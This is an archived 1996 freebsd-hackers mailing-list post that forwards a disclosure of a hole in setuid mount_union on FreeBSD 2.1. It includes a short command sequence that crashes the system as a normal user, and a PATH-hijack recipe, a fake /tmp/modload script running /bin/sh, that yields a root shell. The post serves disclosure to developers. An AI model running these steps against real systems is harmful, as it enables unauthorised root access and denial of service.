Date: Fri, 17 May 1996 19:06:03 -0400 (EDT) From: Dan Polivy <danp@library.pride.net> To: freebsd-hackers@freebsd.org Subject: SECURITY BUG in FreeBSD (fwd) Message-ID: <Pine.BSF.3.91.960517190355.230C-100000@library.pride.net>
next in thread | raw e-mail | index | archive | help
I came across this in my travels...thought you guys may be interesting (in case you didn't already know)...It's worked for me on my -RELEASE, and -STABLE machines...dunno about any others... Dan +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ | JRI HIS MIS Systems Administrator/Tech Support | |////////////////////////////////////////////////////////////////| | danp@busstop.org dpolivy@jri.org danp@library.pride.net | |\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\| | Check out JRI's Homepage at http://www.jri.org | |////////////////////////////////////////////////////////////////| | EMail health@jri.org or check out http://www.jri.org/jrihealth | +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+ --------------------------------- Hi! FreeBSD has a security hole... dangerous is mount_union if suid is set vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT probably FreeBSD 2.1 STABLE is not vulnerable to crash system (as a normal user) try this: mkdir a mkdir b mount_union ~/a ~/b mount_union -b ~/a ~/b to got euid try this: export PATH=/tmp:$PATH #if zsh, of course echo /bin/sh >/tmp/modload chmod +x /tmp/modload mount_union /dir1 /dir2 and You are root! Hole found by Adam Kubicki Best wishes Chris Labanowski KL ----------------------------------
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.91.960517190355.230C-100000>